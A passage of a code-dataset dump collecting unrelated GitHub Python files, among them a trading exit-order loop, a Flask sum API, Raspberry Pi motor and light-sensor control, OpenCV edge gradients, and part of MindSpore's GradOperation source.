Target.objects.get(nifty_symbol=trade.nifty_symbol).price\n # trail sl to entry if ltp is greater than entry by sl \n sl = trail_sl(entry_price, ltp, sl, trade)\n if ltp >= entry_price + target or ltp <= entry_price - sl:\n trade.exit_price = ltp\n trade.exit_datetime = datetime.datetime.now()\n trade.save()\n for user in active_users:\n angel = Angel(user.email, trade)\n angel.exitOrder(ltp)\n except Exception as e:\n pass\n\nif __name__ == '__main__':\n while True:\n exitOrder()\n time.sleep(1)\n","repo_name":"gummadidala/tradeserver","sub_path":"TradeXpress/exit_order.py","file_name":"exit_order.py","file_ext":"py","file_size_in_byte":1839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"18675820245","text":"from flask import Flask, request\nimport operations\n\napp = Flask(__name__)\n\n@app.route('/')\ndef hello_world():\n return \"Hello World\"\n\n@app.route('/sum', methods=['GET','POST'])\ndef sumCalculate():\n value_a=request.args.get('value_a')\n value_b=request.args.get('value_b')\n sum=operations.sum(value_a,value_b)\n return str(sum)\n\n@app.route('/queryparams',methods=['GET'])\ndef paramsDemo():\n name=request.args.get('name')\n return name\n\n@app.route('/postparams', methods=['POST'])\ndef postParamsDemo():\n params=request.json\n value_a=params[\"value_a\"]\n value_b=params[\"value_b\"]\n sum=operations.sum(value_a,value_b)\n return str(sum)\n\nif __name__=='__main__':\n app.run()","repo_name":"avirup171/Python-IoT","sub_path":"rest-api-server-flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"25220770549","text":"#!/usr/bin/env python3\n'''Module.\n'''\n\n\ndef update_topics(mongo_collection, name, topics):\n '''Function that changes all topics of a collection's document based on\n the name.\n '''\n mongo_collection.update_many(\n {'name': name},\n {'$set': {'topics': topics}}\n )\n","repo_name":"MosesSoftEng/alx-backend-storage","sub_path":"0x01-NoSQL/10-update_topics.py","file_name":"10-update_topics.py","file_ext":"py","file_size_in_byte":294,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"}
+{"seq_id":"15159845054","text":"import requests\nimport json\n\n\ndef test_mikoservletpoc():\n url = 'http://miko3-aks-agic.miko2.co.in/mikoservletpoc/miko-servlet-poc/recommendation2'\n files = {'file': open('C://Users//basav//PycharmProjects//ApiIntegration_MIko//Testcases//test_miko-servlet-poc'\n '//servalet-poc data//withoutslot.txt', 'rb')}\n\n m = requests.get(url, files=files,)\n print(m.status_code)\n print(m.text)\n assert m.status_code == 200\n","repo_name":"basava761/miko_API","sub_path":"test_miko-servlet-poc/servalet-poc data/test_servaletpoc.py","file_name":"test_servaletpoc.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"31086721739","text":"from setuptools import find_packages\nfrom setuptools import setup\n\nwith open('README.md') as readme_file:\n readme = readme_file.read()\n\nrequirements = [\n 'Cython==0.29.13',\n 'Flask==1.1.1',\n 'flask-cors==3.0.8',\n 'gensim==3.8.0',\n 'lexrank==0.1.0',\n 'matplotlib==3.1.1',\n 'nltk==3.4.5',\n 'nose==1.3.7',\n 'numpy==1.17.2',\n 'pandas==0.25.1',\n 'scikit-learn==0.21.3',\n 'seaborn==0.9.0',\n 'spacy==2.1.8',\n 'swifter==0.295',\n 'tqdm==4.35.0',\n 'wheel'\n ]\n\n\nsetup(\n\n author=\"teddyauthors\",\n author_email='teddyauthors@gmail.com',\n classifiers=[\n 'Development Status :: 2 - Pre-Alpha',\n 'License :: OSI Approved :: Apache Software License',\n 'Natural Language :: English',\n 'Programming Language :: Python :: 3.6',\n ],\n description=\"\",\n install_requires=requirements,\n license=\"Apache Software License 2.0\",\n long_description=readme + '\\n\\n',\n include_package_data=True,\n name='Teddy',\n packages=find_packages(),\n setup_requires=requirements,\n test_suite='tests',\n tests_require=requirements,\n version='0.1.0',\n zip_safe=False,\n)\n","repo_name":"megagonlabs/teddy","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"19"}
+{"seq_id":"37694582919","text":"import time\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\n\npin_coilA1 = 10\npin_coilA2 = 27\npin_coilB1 = 17\npin_coilB2 = 22\nLDR_PIN = 23\n\ndef motorSetup():\n GPIO.setup(pin_coilA1, GPIO.OUT)\n GPIO.setup(pin_coilA2, GPIO.OUT)\n GPIO.setup(pin_coilB1, GPIO.OUT)\n GPIO.setup(pin_coilB2, GPIO.OUT)\n\ndef motorFree():\n motorStep(0, 0, 0, 0)\n\ndef motorMove(steps, delay):\n if steps >= 0:\n for i in range(0, steps):\n motorStep(1, 0, 1, 0)\n time.sleep(delay)\n motorStep(0, 1, 1, 0)\n time.sleep(delay)\n motorStep(0, 1, 0, 1)\n time.sleep(delay)\n motorStep(1, 0, 0, 1)\n time.sleep(delay)\n else:\n for i in range(0, -steps):\n motorStep(1, 0, 1, 0)\n time.sleep(delay)\n motorStep(1, 0, 0, 1)\n time.sleep(delay)\n motorStep(0, 1, 0, 1)\n time.sleep(delay)\n motorStep(0, 1, 1, 0)\n time.sleep(delay)\n\ndef motorStep(a1, a2, b1, b2):\n GPIO.output(pin_coilA1, a1)\n GPIO.output(pin_coilA2, a2)\n GPIO.output(pin_coilB1, b1)\n GPIO.output(pin_coilB2, b2)\n\ndef ldr_value():\n value = 0\n GPIO.setup(LDR_PIN, GPIO.OUT)\n GPIO.setup(LDR_PIN, GPIO.LOW)\n time.sleep(0.1)\n start = time.time()\n GPIO.setup(LDR_PIN, GPIO.IN)\n while (GPIO.input(LDR_PIN) == GPIO.LOW):\n value += 1\n finish = time.time()\n duration = 1000 * (finish - start)\n return duration\n\nlightLevel = float(raw_input(\"Desired light level: \"))\n\nmotorSetup()\nmotorFree()\n\nmotorPosition = 64\n\ntry:\n while True:\n motorAdjust = 0\n ldr_val = ldr_value()\n print(\"LDR: %s\" % ldr_val)\n if ldr_val < lightLevel - 1:\n if motorPosition < 128:\n motorAdjust = 8\n motorPosition += motorAdjust\n print(\"Too bright, adjusting motor to %s\" % motorPosition)\n elif ldr_val > lightLevel + 1:\n if motorPosition > 0:\n motorAdjust = -8\n motorPosition += motorAdjust\n print(\"Too dim, adjusting motor to %s\" % motorPosition)\n else:\n print(\"Just right\")\n if motorAdjust == 0:\n time.sleep(0.25)\nexcept KeyboardInterrupt:\n pass\n\nGPIO.cleanup()\n\n","repo_name":"epic709/thinkerersA01","sub_path":"code/step_light.py","file_name":"step_light.py","file_ext":"py","file_size_in_byte":2029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"43353476907","text":"from django.db import models\nfrom Accounts.models import User\nfrom os import path,remove\nfrom cloudX.settings import MEDIA_ROOT\nfrom cloudX.settings import domain\n\n_types = [\n ('sports','Sports'),\n ('tech','Technical'),\n ('cultural','Cultural'),\n ('other','Other'),\n]\n\n# Create your models here.\n\nclass Data(models.Model):\n title = models.CharField(max_length=225)\n user = models.ForeignKey(to = User,on_delete=models.CASCADE)\n description = models.TextField(null=True,blank=True)\n link = models.TextField(null=True,blank=True)\n type = models.CharField(max_length=10,choices=_types)\n file = models.FileField(upload_to='data/')\n date = models.DateField()\n \n def extension(self):\n name, extension = path.splitext(self.file.name)\n return extension\n \n def delete(self, *args, **kwargs):\n remove(path.join(MEDIA_ROOT, self.file.name))\n super(Data,self).delete(*args,**kwargs)\n","repo_name":"KhushalJangid/cloudX","sub_path":"main/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"72047330922","text":"#!/usr/bin/python3\n\nimport cv2\nimport numpy as np\n\ncap = cv2.VideoCapture(0)\nwhile cap.isOpened():\n\t_ , img = cap.read()\n\tgray = cv2.cvtColor(img , cv2.COLOR_BGR2GRAY)\n\n# LAPLACIAN 2nd argument is datatype 64 float , 3rd argument is kernel size , it is optional\n\tlap = cv2.Laplacian(gray , cv2.CV_64F , ksize=5)\n\t\n# SobelX 2nd arg is datatype 64 float 3rd is value of dx and 4th is dy\n\tsobelX = cv2.Sobel(gray , cv2.CV_64F , 1 ,0)\n\tsobelX = np.uint8(np.absolute(sobelX))\n\n# SObelY\n\tsobelY = cv2.Sobel(gray , cv2.CV_64F , 0 ,1)\n\tsobelY = np.uint8(np.absolute(sobelY))\n\n# Sobel Combined\n\tsobel_com = cv2.bitwise_or(sobelX ,sobelY)\n# Converting into Uint8\n\tlap = np.uint8(np.absolute(lap))\n\t\t\n\tcv2.imshow('laplacian', lap)\n\tcv2.imshow('SobelX', sobelX)\n\tcv2.imshow('Sobel_Y', sobelY)\n\tcv2.imshow('Sobel_Com', sobel_com)\n\tcv2.imshow('Gray', gray)\n#image = [img,dst,blur,gblur,median,bilateral]\n\tif cv2.waitKey(1) == ord('q'):\n\t\tbreak\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"crashoverloaded/Opencv_Days","sub_path":"Day5/image_gradients.py","file_name":"image_gradients.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"}
+{"seq_id":"5447584398","text":"import matplotlib.pyplot as plt\r\nfrom mpl_toolkits.axes_grid1 import host_subplot\r\n\r\n# plot drawing & update\r\ndef draw_plot(data):\r\n\r\n print(type(data))\r\n for r in data:\r\n for k in r:\r\n print(k)\r\n\r\n plt.style.use('dark_background')\r\n\r\n host = host_subplot(111)\r\n\r\n par = host.twinx()\r\n\r\n host.set_ylabel(\"Temp.\", c=\"red\")\r\n par.set_ylabel(\"Pulse\", c=\"blue\")\r\n host.spines['left'].set_color(\"red\")\r\n par.spines['right'].set_color(\"blue\")\r\n\r\n y_temp = []\r\n y_pulse = []\r\n x = []\r\n x_ticks = []\r\n i = 0\r\n\r\n for r in data:\r\n print(r[5])\r\n y_temp.append(r[5])\r\n print(r[6])\r\n y_pulse.append(r[6])\r\n x.append(i)\r\n i += 1\r\n record = \"day \" + str(r[3]) + \", \" + str(r[2])\r\n x_ticks.append(record)\r\n\r\n plt.xticks(x, x_ticks, rotation=10)\r\n\r\n print(y_temp)\r\n print(y_pulse)\r\n p1 = host.scatter(x, y_temp, c=\"red\", label=\"Temp.\")\r\n p2 = par.scatter(x, y_pulse, c=\"blue\", label=\"Pulse\")\r\n\r\n return x_ticks\r\n\r\n","repo_name":"KonradHolewka/Hospi_App","sub_path":"plotdraw.py","file_name":"plotdraw.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"39"}
+{"seq_id":"22684848844","text":"from __future__ import absolute_import\nfrom functools import partial\n\nfrom types import FunctionType, MethodType\nimport mindspore as ms\nfrom mindspore import context\nfrom mindspore.common.parameter import Parameter, ParameterTuple\nfrom mindspore.parallel._utils import _grads_divided_by_device_num_if_recomputation\nfrom mindspore._c_expression import GradOperation_, HyperMap_, Map_, MultitypeFuncGraph_, Tail_, \\\n TupleAdd_, UnpackCall_, ZipOperation_, ListAppend_, TupleGetItemTensor_, ListInsert_, \\\n SequenceSliceGetItem_, ListSliceSetItem_, VmapOperation_, TaylorOperation_, ListPop_, \\\n ListClear_, ListReverse_, ListExtend_, DictClear_, DictHasKey_, DictUpdate_, DictFromKeys_, \\\n ZerosLike_, TensorIndexGetitem_, TensorIndexSetitem_, ListAdd_\nfrom mindspore.common import dtype as mstype\nfrom mindspore.common.api import jit, _pynative_executor, _wrap_func\nfrom mindspore.common.api import _add_flags, _core\nfrom mindspore.ops.primitive import Primitive\nfrom mindspore.ops import signature as sig\n\n__all__ = [TupleAdd_, ListAdd_, UnpackCall_, TupleGetItemTensor_, SequenceSliceGetItem_,\n ListSliceSetItem_, ZerosLike_, TensorIndexGetitem_, TensorIndexSetitem_]\n\n\ndef add_flags(fn=None, **flags):\n \"\"\"\n A decorator that adds a flag to the function.\n\n Note:\n Only supports bool value.\n\n Args:\n fn (Function): Function or cell to add flag. Default: ``None`` .\n flags (dict): Flags use kwargs. Default: ``None`` .\n\n Returns:\n Function, the function with added flags.\n\n Examples:\n >>> net = Net();\n >>> net = add_flags(net, predit=True)\n >>> print(hasattr(net, '_func_graph_flags'))\n True\n \"\"\"\n\n return _add_flags(fn, **flags)\n\n\ndef core(fn=None, **flags):\n \"\"\"\n A decorator that adds a flag to the function.\n\n By default, the function is marked as True, enabling to use this decorator to\n set flag to a graph.\n\n Args:\n fn (Function, optional): Function to add flag. Default: ``None`` .\n flags (dict, optional): The following flags can be set core, which indicates that this is a core function or\n other flag. Default: ``None`` .\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> net = Net()\n >>> net = core(net, predit=True)\n >>> print(hasattr(net, '_func_graph_flags'))\n True\n \"\"\"\n\n return _core(fn, **flags)\n\n\ndef _get_grad_weights_id(weights=None):\n \"\"\"generate id of parameters\"\"\"\n res = \"\"\n if isinstance(weights, Parameter):\n res = weights.name + str(weights.requires_grad)\n if isinstance(weights, ParameterTuple):\n res = ''.join(item.name + str(item.requires_grad) for item in weights)\n if isinstance(weights, list):\n res = ''.join(item.name + str(item.requires_grad) for item in weights if isinstance(item, Parameter))\n return res\n\n\nclass GradOperation(GradOperation_):\n \"\"\"\n A higher-order function which is used to generate the gradient function for the input function.\n\n The gradient function generated by `GradOperation` higher-order function can be customized by\n construction arguments.\n\n For example, given an input function `net = Net()` that takes `x` and `y` as inputs, and has a parameter `z`,\n see `Net` in Examples.\n\n - Used to get the derivative of the input:\n\n 1. 
Returns gradients with respect to the first input (see `GradNetWrtX` in Examples).\n\n 1) Construct a `GradOperation` higher-order function with default arguments: `grad_op = GradOperation()`.\n\n 2) Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 3) Call the gradient function with input function's inputs to get the gradients with respect to the first\n input: `grad_op(net)(x, y)`.\n\n 2. Returns gradients with respect to all inputs (see `GradNetWrtXY` in Examples).\n\n 1) Construct a `GradOperation` higher-order function with `get_all=True` which indicates getting gradients\n with respect to all inputs, they are `x` and `y` in example function `Net()`:\n `grad_op = GradOperation(get_all=True)`.\n\n 2) Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 3) Call the gradient function with input function's inputs to get the gradients with respect to all inputs:\n `gradient_function(x, y)`.\n\n - Used to get the derivative of the parameters:\n\n Returns gradients with respect to given parameters (see `GradNetWithWrtParams` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_by_list=True`:\n `grad_op = GradOperation(get_by_list=True)`.\n\n 2. Construct a `ParameterTuple` that will be passed to the input function when constructing\n `GradOperation` higher-order function, it will be used as a parameter filter that determine\n which gradient to return: `params = ParameterTuple(net.trainable_params())`.\n\n 3. Call it with input function and `params` as arguments to get the gradient function:\n `gradient_function = grad_op(net, params)`.\n\n 4. Call the gradient function with input function's inputs to get the gradients with\n respect to given parameters: `gradient_function(x, y)`.\n\n - Used to get the derivative of the inputs and parameters at the same time:\n Returns gradients with respect to all inputs and given parameters in the format of ((dx, dy), (dz))\n (see `GradNetWrtInputsAndParams` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_all=True` and `get_by_list=True`:\n `grad_op = GradOperation(get_all=True, get_by_list=True)`.\n\n 2. Construct a `ParameterTuple` that will be passed along input function when constructing\n `GradOperation` higher-order function: `params = ParameterTuple(net.trainable_params())`.\n\n 3. Call it with input function and `params` as arguments to get the gradient function:\n `gradient_function = grad_op(net, params)`.\n\n 4. Call the gradient function with input function's inputs to get the gradients with respect to\n all inputs and given parameters: `gradient_function(x, y)`.\n\n - We can configure the sensitivity(gradient with respect to output) by setting `sens_param` as True and\n passing an extra sensitivity input to the gradient function, the sensitivity input should has the\n same shape and type with input function's output(see `GradNetWrtXYWithSensParam` in Examples).\n\n 1. Construct a `GradOperation` higher-order function with `get_all=True` and `sens_param=True`:\n `grad_op = GradOperation(get_all=True, sens_param=True)`.\n\n 2. Define `grad_wrt_output` as `sens_param` which works as the gradient with respect to output:\n `grad_wrt_output = Tensor(np.ones([2, 2]).astype(np.float32))`.\n\n 3. Call it with input function as argument to get the gradient function: `gradient_function = grad_op(net)`.\n\n 4. 
Call the gradient function with input function's inputs and `sens_param` to\n get the gradients with respect to all inputs: `gradient_function(x, y, grad_wrt_output)`.\n\n Note:\n For above gradient functions, the returned gradient result may vary for grad result element number:\n\n - Return a single value if only one result.\n - Return a tuple for multiple results.\n - Return an empty tuple for no result.\n\n Args:\n get_all (bool): If ``True`` , get all the gradients with respect to inputs. Default: ``False`` .\n get_by_list (bool): If ``True`` , get all the gradients with respect to Parameter free variables.\n If get_all and get_by_list are both ``False`` , get the gradient with respect to first input.\n If get_all and get_by_list are both ``True`` , get the gradients with respect to inputs and\n Parameter free variables at the same time in the form of (\"gradients with respect to inputs\",\n \"gradients with respect to parameter free variables\"). Default: ``False`` .\n sens_param (bool): Whether to append sensitivity (gradient with respect to output) as input.\n If sens_param is ``False`` , a 'ones_like(outputs)' sensitivity will be attached automatically.\n Default: ``False`` .\n If the sensor_param is ``True`` , a sensitivity (gradient with respect to output) needs to be transferred\n through the location parameter or key-value pair parameter. If the value is transferred through\n the key-value pair parameter, the key must be sens.\n\n Returns:\n The higher-order function which takes a function as argument and returns gradient function for it.\n\n Raises:\n TypeError: If `get_all`, `get_by_list` or `sens_param` is not a bool.\n\n Supported Platforms:\n ``Ascend`` ``GPU`` ``CPU``\n\n Examples:\n >>> import mindspore\n >>> import numpy as np\n >>> from mindspore import dtype as mstype\n >>> from mindspore import Tensor, ops, nn, Parameter\n >>> class Net(nn.Cell):\n ... def __init__(self):\n ... super(Net, self).__init__()\n ... self.matmul = ops.MatMul()\n ... self.z = Parameter(Tensor(np.array([1.0], np.float32)), name='z')\n ... def construct(self, x, y):\n ... x = x * self.z\n ... out = self.matmul(x, y)\n ... return out\n ...\n >>> class GradNetWrtX(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtX, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation()\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y)\n ...\n >>> x = Tensor([[0.5, 0.6, 0.4], [1.2, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.01, 0.3, 1.1], [0.1, 0.2, 1.3], [2.1, 1.2, 3.3]], dtype=mstype.float32)\n >>> output = GradNetWrtX(Net())(x, y)\n >>> print(output)\n [[1.4100001 1.5999999 6.6 ]\n [1.4100001 1.5999999 6.6 ]]\n >>>\n >>> class GradNetWrtXY(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtXY, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation(get_all=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... 
return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.1, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtXY(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 4.50000000e+00, 2.70000005e+00, 3.60000014e+00],\n [ 4.50000000e+00, 2.70000005e+00, 3.60000014e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 2.59999990e+00, 2.59999990e+00, 2.59999990e+00],\n [ 1.89999998e+00, 1.89999998e+00, 1.89999998e+00],\n [ 1.30000007e+00, 1.30000007e+00, 1.30000007e+00]]))\n >>>\n >>> class GradNetWrtXYWithSensParam(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtXYWithSensParam, self).__init__()\n ... self.net = net\n ... self.grad_op = ops.GradOperation(get_all=True, sens_param=True)\n ... self.grad_wrt_output = Tensor([[0.1, 0.6, 0.2], [0.8, 1.3, 1.1]], dtype=mstype.float32)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net)\n ... return gradient_function(x, y, self.grad_wrt_output)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.11, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtXYWithSensParam(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 2.21099997e+00, 5.09999990e-01, 1.49000001e+00],\n [ 5.58800030e+00, 2.68000007e+00, 4.07000017e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 1.51999998e+00, 2.81999993e+00, 2.14000010e+00],\n [ 1.09999990e+00, 2.04999995e+00, 1.54999995e+00],\n [ 9.00000036e-01, 1.54999995e+00, 1.25000000e+00]]))\n >>>\n >>> class GradNetWithWrtParams(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWithWrtParams, self).__init__()\n ... self.net = net\n ... self.params = ParameterTuple(net.trainable_params())\n ... self.grad_op = ops.GradOperation(get_by_list=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net, self.params)\n ... return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.8, 0.6, 0.2], [1.8, 1.3, 1.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.11, 3.3, 1.1], [1.1, 0.2, 1.4], [1.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWithWrtParams(Net())(x, y)\n >>> print(output)\n (Tensor(shape=[1], dtype=Float32, value= [ 2.15359993e+01]),)\n >>>\n >>> class GradNetWrtInputsAndParams(nn.Cell):\n ... def __init__(self, net):\n ... super(GradNetWrtInputsAndParams, self).__init__()\n ... self.net = net\n ... self.params = ParameterTuple(net.trainable_params())\n ... self.grad_op = ops.GradOperation(get_all=True, get_by_list=True)\n ... def construct(self, x, y):\n ... gradient_function = self.grad_op(self.net, self.params)\n ... 
return gradient_function(x, y)\n >>>\n >>> x = Tensor([[0.1, 0.6, 1.2], [0.5, 1.3, 0.1]], dtype=mstype.float32)\n >>> y = Tensor([[0.12, 2.3, 1.1], [1.3, 0.2, 2.4], [0.1, 2.2, 0.3]], dtype=mstype.float32)\n >>> output = GradNetWrtInputsAndParams(Net())(x, y)\n >>> print(output)\n ((Tensor(shape=[2, 3], dtype=Float32, value=\n [[ 3.51999998e+00, 3.90000010e+00, 2.59999990e+00],\n [ 3.51999998e+00, 3.90000010e+00, 2.59999990e+00]]), Tensor(shape=[3, 3], dtype=Float32, value=\n [[ 6.00000024e-01, 6.00000024e-01, 6.00000024e-01],\n [ 1.89999998e+00, 1.89999998e+00, 1.89999998e+00],\n [ 1.30000007e+00, 1.30000007e+00, 1.30000007e+00]])), (Tensor(shape=[1], dtype=Float32, value=\n [ 1.29020004e+01]),))\n \"\"\"\n\n def __init__(self, get_all=False, get_by_list=False, sens_param=False):\n \"\"\"Initialize GradOperation.\"\"\"\n if not isinstance(get_all, bool):\n raise TypeError(f\"For 'GradOperation', the 'get_all' should be bool, but got {type(get_all).__name__}\")\n if not isinstance(get_by_list, bool):\n raise TypeError(f\"For 'GradOperation', the 'get_by_list' should be bool, \"\n f\"but got {type(get_by_list).__name__}\")\n if not isinstance(sens_param, bool):\n raise TypeError(f\"For 'GradOperation', the 'sens_param' should be bool, \"\n f\"but got {type(sens_param).__name__}\")\n self.get_all = get_all\n self.get_by_list = get_by_list\n self.sens_param = sens_param\n GradOperation_.__init__(self, 'grad', get_all, get_by_list, sens_param, False, False, False, False)\n self.grad_fn = None\n self.fn = None\n self.weights_id = None\n self.pynative_ = False\n self.grad_position = (0,)\n\n def __call__(self, fn, weights=None):\n weights_id = _get_grad_weights_id(weights)\n if self.grad_fn is not None and self.fn == fn and self.weights_id == weights_id:\n return self.grad_fn\n grad_ = GradOperation(self.get_all, self.get_by_list, self.sens_param)\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n # If calling Grad in pure PYNATIVE_MODE do grad in PYNATIVE_MODE\n # In pure PYNATIVE_MODE the out layer after_grad just used to set pynative flag for inner GradOperation.\n # In PYNATIVE_MODE calling Grad from functions decorated with 'jit', use the out layer after_grad do\n # grad in GRAPH_MODE.\n if context.get_context(\"mode\") == context.GRAPH_MODE:\n dynamic_shape_inputs = None\n if isinstance(fn, ms.nn.Cell):\n dynamic_shape_inputs = fn.get_inputs()\n fn.grad_ops_label = True\n if self.get_by_list:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args, **kwargs):\n return grad_(fn, weights)(*args, **kwargs)\n else:\n @jit(input_signature=dynamic_shape_inputs)\n def after_grad(*args, **kwargs):\n return grad_(fn)(*args, **kwargs)\n elif self.pynative_:\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n\n @_wrap_func\n def after_grad(*args, **kwargs):\n self._pynative_forward_run(fn, grad_, weights, args, kwargs)\n _pynative_executor.grad(fn, grad_, weights, self.grad_position, *args, **kwargs)\n out = _pynative_executor()\n out = _grads_divided_by_device_num_if_recomputation(out)\n return out\n else:\n grad_.pynative_ = True\n if not _pynative_executor.enable_grad():\n raise RuntimeError(\"In no_grad context, you can not calculate gradient\")\n # after_grad of this branch can't use @jit, just directly call grad_\n if self.get_by_list:\n def after_grad(*args, **kwargs):\n return grad_(fn, weights)(*args, **kwargs)\n else:\n def after_grad(*args, **kwargs):\n 
return grad_(fn)(*args, **kwargs)\n\n self.grad_fn = after_grad\n self.fn = fn\n self.weights_id = weights_id\n return self.grad_fn\n\n def _pynative_forward_run(self, fn, grad, weights, args, kwargs):\n \"\"\" Pynative forward run to build grad graph. \"\"\"\n new_kwargs = kwargs\n if self.sens_param:\n if 'sens' not in kwargs.keys():\n args = args[:-1]\n else:\n new_kwargs = kwargs.copy()\n new_kwargs.pop('sens')\n if isinstance(fn, (FunctionType, MethodType)):\n if not _pynative_executor.check_run(grad, fn, weights, None, *args, **new_kwargs):\n _pynative_executor.set_grad_flag(True)\n _pynative_executor.new_graph(fn, *args, **new_kwargs)\n output = fn(*args, **new_kwargs)\n _pynative_executor.end_graph(fn, output, *args, **new_kwargs)\n else:\n # Check if fn have run already\n if not _pynative_executor.check_run(grad, fn, weights, None, *args, **new_kwargs):\n fn.set_grad()\n fn(*args, **new_kwargs)\n fn.set_grad(False)\n\n\nclass _TaylorOperation(TaylorOperation_):\n \"\"\"\n Generate the higher order derivatives function for the input function.\n \"\"\"\n\n def __init__(self):\n \"\"\"Initialize TaylorOperation.\"\"\"\n TaylorOperation_.__init__(self, 'taylorgrad')\n self.grad_fn = None\n self.fn = None\n\n def __call__(self, fn):\n if self.grad_fn is not None and self.fn == fn:\n return self.grad_fn\n taylor_grad_ = _TaylorOperation()\n\n # If calling Grad in GRAPH_MODE or calling Grad in functions decorated with 'jit', do grad in GRAPH_MODE\n\n @jit\n def after_taylor_grad(*args):\n return taylor_grad_(fn)(*args)\n\n self.grad_fn = after_taylor_grad\n self.fn = fn\n return self.grad_fn\n\n\ndef _combine_weight(grad_position, weights, out, out_with_ids):\n \"\"\" Making resulting tuple for weight, when return_ids is set to True. \"\"\"\n weight_tuple = []\n position = 0\n if isinstance(weights, (list, ParameterTuple, tuple)) and grad_position:\n for weight in weights:\n weight_tuple.append((weight.name, out[1][position]))\n position += 1\n elif isinstance(weights, (list, ParameterTuple, tuple)):\n for weight in weights:\n weight_tuple.append((weight.name, out[position]))\n position += 1\n elif grad_position:\n weight_tuple.append(weights.name)\n weight_tuple.append(out[1])\n else:\n weight_tuple.append(weights.name)\n weight_tuple.append(out)\n if grad_position:\n out_with_ids.append(tuple(weight_tuple))\n else:\n out_with_ids = weight_tuple\n return out_with_ids\n\n\ndef _combine_position(grad_position, weights, out, out_with_ids):\n \"\"\" Making resulting tuple for position, when return_ids is set to True. \"\"\"\n position_tuple = []\n position = 0\n if grad_position == (0,) and weights is not None:\n position_tuple.append(0)\n position_tuple.append(out[0])\n elif grad_position == (0,):\n position_tuple.append(0)\n position_tuple.append(out)\n elif weights is not None:\n for index in grad_position:\n position_tuple.append((index, out[0][position]))\n position += 1\n else:\n for index in grad_position:\n position_tuple.append((index, out[position]))\n position += 1\n if weights:\n out_with_ids.append(tuple(position_tuple))\n else:\n out_with_ids = position_tuple\n return out_with_ids\n\n\ndef _combine_with_ids(grad_position, weights, out):\n \"\"\" Making resulting tuple, when return_ids is set to True. 
\"\"\"\n out_with_ids = []\n if grad_position:\n out_with_ids = _combine_position(\n grad_position, weights, out, out_with_ids)\n if weights is not None:\n out_with_ids = _combine_weight(\n grad_position, weights, out, out_with_ids)\n if not out_with_ids:\n raise ValueError(f\"output tuple should not be a empty tuple.\")\n return tuple(out_with_ids)\n\n\nclass _Grad(GradOperation_):\n \"\"\"\n A higher-order function which is used to generate the gradient function by position for the input function.\n \"\"\"\n\n def __init__(self, get_by_list=False, sens_param=False, get_by_position=False, has_aux=False, get_value=False,\n return_ids=False):\n \"\"\"Initialize _Grad.\"\"\"\n if not isinstance(get_by_position, bool):\n raise TypeError(f\"For '_Grad', the 'get_by_position' should be bool, \"\n f\"but got {type(get_by_position).__name__}\")\n if not isinstance(get_by_list, bool):\n raise TypeError(f\"For '_Grad', the 'get_by_list' should be bool, \"\n f\"but got {type(get_by_list).__name__}\")\n if not isinstance(sens_param, bool):\n raise TypeError(f\"For '_Grad', the 'sens_param' should be bool, \"\n 